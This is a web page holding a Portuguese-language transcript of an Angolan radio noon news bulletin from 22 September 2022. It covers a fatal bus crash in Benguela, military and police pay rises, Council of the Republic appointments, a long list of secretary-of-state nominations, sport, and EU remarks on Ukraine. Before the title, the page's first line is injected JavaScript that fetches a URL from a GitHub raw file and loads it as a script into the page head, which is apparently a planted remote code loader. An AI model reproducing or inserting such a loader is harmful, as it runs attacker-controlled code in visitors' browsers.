;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal das 12h, edição de 22 de Setembro de 2022 | RadioPlayDigital
Jornal das 12h, edição de 22 de Setembro de 2022

TREZE PESSOAS PERDERAM A VIDA NA SEQUÊNCIA DE UM ACIDENTE DE VIAÇÃO NA PROVÍNCIA DE BENGUELA. POLÍCIA NACIONAL APONTA EXCESSO DE VELOCIDADE COMO PRINCIPAL CAUSA; 

AUMENTO DE SALÁRIOS DE EFECTIVOS DAS FORÇAS ARMADAS E DA POLÍCIA NACIONAL A PARTIR DESTE MÊS. MEDIDA ACERTIVA DO EXECUTIVO, DIZ ECONOMISTA CARLOS ROSADO; 

PRESIDENTE DA REPÚBLIVA ESPERA DOS CONSELHEIRO QUE TRABALHEM PARA O BEM-ESTAR DOS CIDADÃOS RUMO AO DESENVOLVIMENTO ECONÓMICO E SOCIAL DO PAÍS;

UNIÃO EUROPEIA PEDE À CHINA QUE USE A SUA INFLUÊNCIA PARA ACABAR COM GUERRA NA UCRÂNIA; 

JINGLE MIX

Jornal da tarde da MFM, quinta-feira, 22 de setembro de 2022, tem o suporte técnico de Edson Machado e Mauro Fernandes, coordenação de Alves Fernandes, edição de Abílio Cândido, apresenta-lhe às notícias o Tony Fancy.

JINGLE NOTÍCIAS

Treze mortos e dezasseis feridos em estados grave é o resultado de um capotamento de um miniautocarro ocorrido nesta quarta-feira, no morro do Pundo, na estrada nacional 250, município do Bocoio, Província de Benguela.

Segundo o porta-voz do Comando Provincial de Benguela da Polícia Nacional, Superintendente, Ernesto Tchiwale, as possíveis causas que estiveram na base do infausto acontecimento.

ERNESTO TCHIWALE 12H00

JINGLE MFM

O Conselho de Ministros aprovou nesta quarta-feira o ajuste salarial das Forças Armadas Angolanas e da Polícia Nacional, garantindo um aumento dos salários pagos aos efectivos em 6% e nalguns casos, um incremento até 14%, para os que ganhem abaixo do salário mínimo nacional.

Trata-se da primeira grande decisão tomada pelo presidente da República, João Lourenço, há menos de uma semana da investidura, cumprindo assim com o discurso proferido na altura.

A Ministra das Finanças, Vera Daves, diz que a aprovação pelo Conselho de Ministros desta medida, permite que os contemplados recebam desde agora os salários reflectindo já os incrementos, acrescidos dos retroactivos que contam a partir do mês de junho passado.

VERA DAVES 1 12H00

De acordo com Vera Daves, os dois departamentos ministeriais, propuseram ao Conselho de Ministro, que o reajuste, fosse considerado desde o momento em que houve aumento salarial ao pessoal civil.

VERA DAVES 2 12H00

E para cumprir com este propósito, a ministra, diz que foi considerado uma reserva financeira.

VERA DAVES 3 12H00

Ministra das Finanças, Vera Daves. 

O Presidente João Lourenço, no discurso de investidura, anunciou também que serão melhoradas as condições de aquartelamento das tropas, tarefa a que o novo Executivo se dedicaria “logo nos primeiros dias da sua entrada em funcionamento.

E o economista, Carlos Rosado, considera justa a medida do executivo, recordando que a última vez que houve um reajuste há 3 anos.

CARLOS ROSADO 1 12H00 

No início deste ano, o governo aprovou o aumento do salário mínimo nacional da função pública, para conferir maior poder de compra aos cidadãos, onde as Forças Armadas Angolanas e a Polícia Nacional, não foram beneficiadas.

CARLOS ROSADO 2 12H00

Economista Carlos Rosado de Carvalho, no espaço da MFM “Economia sem Makas” 

Efectivos das Forças Armadas Angolanas e Polícia Nacional vão ganhar mais.

PONTO

Contribuírem com o seu melhor para que possam agir com sabedoria perante os desafios a enfrentar no exercício das suas funções, é o que se espera dos membros do Conselho da República de acordo com o Presidente da República. 

João Lourenço, que se dirigia aos conselheiros, entre novos e antigos, referiu ser da vontade de todos os angolanos a construção de uma Angola cada vez mais democrática, que traga o bem-estar para os seus cidadãos e que garanta o desenvolvimento económico e social do país.

JOÃO LOURENÇO 12H00

Depois da constituição do Executivo e da nomeação dos governadores provinciais, o Presidente da República salientou ter chegado, agora, o momento de indicar, também, os cidadãos angolanos que vão integrar, a partir de hoje, o Conselho da República.

Tomaram posse, ontem, por inerência de funções, a Vice-Presidente da República, Esperança da Costa, presidente da Assembleia Nacional, Carolina Cerqueira, procurador-geral da República, Hélder Pitta Gróz, vice-presidente do MPLA, Luísa Damião, os presidentes dos partidos políticos com assento no parlamento, nomeadamente, o da UNITA, Adalberto Costa Júnior, da FNLA, Nimi a Simbi, do PRS, Benedito Daniel, e do PHA, Florbela Malaquias.

Tomaram, igualmente, posse os seguintes cidadãos designados pelo Presidente da República: Adriano Botelho de Vasconcelos, Alfeo Vinevala, António Cabamba, a secretária-geral do Conselho de Igrejas Cristãs em Angola (CICA), Deolinda Dorcas Teca, ambientalista Fernanda Renée, o ex-ministro da Justiça e dos Direitos Humanos,  Francisco Queiroz, o jornalista Ismael Mateus, Jorge Valentim, José Carlos Cunha, Luís Nguimbi, Manuel Monteiro, Paula Simons,  Rosa Cruz e Silva, Suzana Mendes e a líder religiosa Suzete João.

O Conselho da República é um órgão colegial consultivo do Chefe de Estado, do qual fazem parte o Vice-Presidente da República, os presidentes da Assembleia Nacional, dos partidos políticos com assento parlamentar, o procurador-geral da República e a vice-presidente do MPLA, entre outras figuras.

PONTO

A Ministra do Ambiente, Ana Paula de Carvalho, diz que é projecto do Executivo elaborar uma cultura de valores ambientais para o país. 

Ana Paula de Carvalho fez esta afirmação nesta quarta-feira, durante a recepção do Ministro da Cultura e Turismo, Filipe Zau, este que antes tinha sob sua tutela o departamento do Ambiente, o dossiê da política ambiental.

ANA PAULA DE CARVALHO 12H00

PONTO CORRIDO

O Serviço de Investigação Criminal está a investigar uma tentativa de quatro homicídios, cujas vítimas são cidadãos mauritanianos, dos quais uma gestante de seis meses, alvejados à queima-roupa durante um assalto na cidade do Luena (Moxico).

As vítimas foram alvejadas com vários disparos com arma de fogo durante um assalto na residência desses expatriados, protagonizado por elementos desconhecidos, na cidade do Luena.

De acordo com Cavó Salah, uma das vítimas, que falava imprensa pública, o facto ocorreu quando dois meliantes, na tentativa de arrombar a porta da residência familiar, efectuaram disparos, atingindo quatro pessoas, inclusive uma mulher gestante que foi acertada na região do abdômen, atingindo mortalidade o feto.

Segundo o interlocutor, também gerente de uma rede comercial denominada “loja das crianças”, sediadas no Luena, os meliantes após terem acesso à residência atingiram outros dois indivíduos, levando uma motorizada e dois telemóveis.

Entretanto, o director clínico do Hospital Geral do Moxico, Zadoque Miza, disse que  três das vítimas já foram operadas, mas apresentam prognóstico reservado.

Disse que na mulher grávida foi identificada cerca de quatro portas de entrada de balas, tendo causado lesões no útero e nos intestinos, esmagando o feto.

::::::

O Presidente da República decreta, nos termos da alínea d) do artigo 119º e do nº 4 do artigo 125º, ambos da Constituição da República de Angola, o seguinte:

São nomeadas as entidades para os cargos abaixo designados:

MINISTÉRIO DA DEFESA, ANTIGOS COMBATENTES E VETERANOS DA PÁTRIA

1. José Maria de Lima, para o cargo de Secretário de Estado para a Defesa Nacional;

2. Afonso Carlos Neto, para o cargo de Secretário de Estado para a Indústria Militar;

3. Domingos André Tchikanha, para o cargo de Secretário de Estado para os Antigos Combatentes e Veteranos da Pátria;

MINISTÉRIO DO INTERIOR

4. José Paulino Cunha da Silva, para o cargo de Secretário de Estado para o Interior;

5. Carlos Armando Albino, para o cargo de Secretário de Estado para o Asseguramento Técnico;

MINISTÉRIO DAS RELAÇÕES EXTERIORES

6. Esmeralda Bravo Conde da Silva Mendonça, para o cargo de Secretária de Estado para as Relações Exteriores;

7. Domingos Custódio Vieira Lopes, para o cargo de Secretário de Estado para a Cooperação Internacional e Comunidades Angolanas;

MINISTÉRIO DAS FINANÇAS

8. Maria Auxiliadora Fragoso Pascoal Ramiro, para o cargo de Secretária de Estado para Administração Finanças e Património;

9. Juciene Clara Daniel Cristiano de Sousa, para o cargo de Secretária de Estado para o Orçamento e Investimento Público;

10. Ottoniel Lobo de Carvalho dos Santos, para o cargo de Secretário de Estado para as Finanças e Tesouro;

MINISTÉRIO DA ECONOMIA E PLANEAMENTO

11. Arsénio Orlando Satyohamba, para o cargo de Secretário de Estado para a Economia;

12. Milton Parménio dos Santos Reis, para o cargo de Secretário de Estado para o Planeamento;

MINISTÉRIO DA ADMINISTRAÇÃO DO TERRITÓRIO

13. Teresa Luís José Fernandes Quivienguele, para o cargo de Secretária de Estado para a Administração do Território;

14. Márcio de Jesus Lopes Daniel, para o cargo de Secretário de Estado para as Autarquias Locais;

MINISTÉRIO DA JUSTIÇA E DOS DIREITOS HUMANOS

15. Evaristo José Solano, para o cargo de Secretário de Estado para a Justiça;

16. Ana Celeste Cardoso Januário, para o cargo de Secretária de Estado dos Direitos Humanos;

 

MINISTÉRIO DA ADMINISTRAÇÃO PÚBLICA, TRABALHO E SEGURANÇA SOCIAL

17. Amélia Augusto Varela, para o cargo de Secretária de Estado da Administração Pública;

18. Pedro José Filipe, para o cargo de Secretário de Estado para o Trabalho e Segurança Social;

 

MINISTÉRIO DA AGRICULTURA E FLORESTAS

19. João Manuel Bartolomeu da Cunha, para o cargo de Secretário de Estado para a Agricultura e Pecuária;

20. André de Jesus Moda, para o cargo de Secretário de Estado para as Florestas;

 

MINISTÉRIO DAS PESCAS E RECURSOS MARINHOS

21. António José da Silva, para o cargo de Secretário de Estado para as Pescas e Recursos Marinhos;

MINISTÉRIO DA INDÚSTRIA E COMÉRCIO

22. Ivan Magalhães do Prado, para o cargo de Secretário de Estado da Indústria;

23. Amadeu de Jesus Alves Leitão Nunes, para o cargo de Secretário de Estado do Comércio;

 

MINISTÉRIO DOS RECURSOS MINERAIS, PETRÓLEO E GÁS

24. Jânio da Rosa Corrêa Victor, para o cargo de Secretário de Estado para os Recursos Minerais;

25. José Alexandre Barroso, para o cargo de Secretário de Estado dos Petróleo e Gás;

 

MINISTÉRIO DAS OBRAS PÚBLICAS, URBANISMO E HABITAÇÃO

26. Manuel José da Costa Molares D’Abril, para o cargo de Secretário de Estado das Obras Públicas;

27. Adérito Adelino João Carlos Mohamed, para o cargo de Secretário de Estado para o Urbanismo e Habitação;

 

MINISTÉRIO DA ENERGIA E ÁGUAS

28. António Fernandes Rodrigues Belsa da Costa, para o cargo de Secretário de Estado para a Energia;

29. Manuel Quintino, para o cargo de Secretário de Estado para as Águas;

 

MINISTÉRIO DOS TRANSPORTES

30. Jorge Bengue Calumbo, para o cargo de Secretário de Estado para os Transportes Terrestres;

31. Emílio Vumpa de André Londa, para o cargo de Secretário de Estado para a Aviação Civil, Marítimo e Portuário;

 

MINISTÉRIO DAS TELECOMUNICAÇÕES, TECNOLOGIAS DE INFORMAÇÃO E COMUNICAÇÃO SOCIAL

 

32. Pascoal Borges Alé Fernandes, para o cargo de Secretário de Estado para as Telecomunicações e Tecnologia de Informação;

33. Nuno dos Anjos Caldas Albino, para o cargo de Secretário de Estado para a Comunicação Social;

 

MINISTÉRIO DO ENSINO SUPERIOR, CIÊNCIA, TECNOLOGIA E INOVAÇÃO

34. Eugénio Adolfo Alves da Silva, para o cargo de Secretário de Estado para o Ensino Superior;

35. Alice de Fátima Pinto de Andrade de Ceita e Almeida, para o cargo de Secretária de Estado para a Ciência, Tecnologia e Inovação;

MINISTÉRIO DA SAÚDE

36. Carlos Alberto Pinto de Sousa, para o cargo de Secretário de Estado para a Saúde Pública;

37. Leonardo Europeu Inocêncio, para o cargo de Secretário de Estado para a Área Hospitalar;

 

MINISTÉRIO DA EDUCAÇÃO

38. Pacheco Francisco, para o cargo de Secretário de Estado para o Ensino Pré-Escolar e Ensino Primário;

39. Gildo Matias José, para o cargo de Secretário de Estado para o Ensino Secundário;

 

MINISTÉRIO DA CULTURA E TURISMO

40. Maria da Piedade de Jesus, para o cargo de Secretária de Estado para a Cultura;

41. Helder Jonas Leonardo Marcelino, para o cargo de Secretário de Estado para o Turismo;

 

MINISTÉRIO DO AMBIENTE

42. Abias Moma Huongo, para o cargo de Secretário de Estado para o Ambiente;

43. Paula Cristina Francisco Coelho, para o cargo de Secretária de Estado para a Acção Climática e Desenvolvimento Sustentável;

 

MINISTÉRIO DA ACÇÃO SOCIAL, FAMÍLIA E PROMOÇÃO DA MULHER

44. Lúcio Gonçalves Amaral, para o cargo de Secretário de Estado para a Acção Social;

45. Alcina Lopes da Cunha Kindanda, para o cargo de Secretária de Estado para a Família e Promoção da Mulher;

 

MINISTÉRIO DA JUVENTUDE E DESPORTOS

46. Francisco Boaventura Canjongo Chitapa, para o cargo de Secretário de Estado para a Juventude;

 

47. Teresa João Ulundo Oliveira, para o cargo de Secretária de Estado para os Desportos;

CONSELHO DE MINISTROS

48. António Fernando Neto Costa, para o cargo de Secretário Adjunto do Conselho de Ministros.

IGAE

Nomeado Sebastião Domingos Gunza, para o cargo de Inspector Geral do Estado.

DESPORTO 

A seleção nacional de futebol sub 23 está a uma vitória de garantir o apuramento a segunda eliminatória de acesso ao campeonato africano de futebol, fruto da vitória sobre a Namíbia por 2-1 esta quarta-feira em Luanda. 

A actualidade desportiva com o Hilário Leonardo 

HILÁRIO-DIRECTO 12H00

INTERNACIONAL 

O alto representante da União Europeia para os Negócios Estrangeiros e a Política de Segurança, Josep Borrell, pediu hoje à China que use a sua influência sobre a Rússia para acabar com a guerra na Ucrânia.

Numa reunião à margem da Assembleia Geral das Nações Unidas, Borrell transmitiu ao ministro dos Negócios Estrangeiros chinês, Wang Yi, as”expectativas europeias de que a China usará a sua influência sobre a Rússia para acabar com a guerra, que está a causar uma crise alimentar, energética e de instabilidade financeira, em todo o mundo”, de acordo com um comunicado emitido pelo gabinete de imprensa do Alto Representante.

Borrell também mencionou a situação “precária” em torno da usina nuclear de Zaporiya, enfatizando que um acidente nuclear pode acontecer a “qualquer momento”, e que uma maneira de evitar uma crise nuclear deve ser discutida como prioridade.

Data de Emissão: 22-09-2022 às 12:00
Género(s): Noticiário
 

Relacionados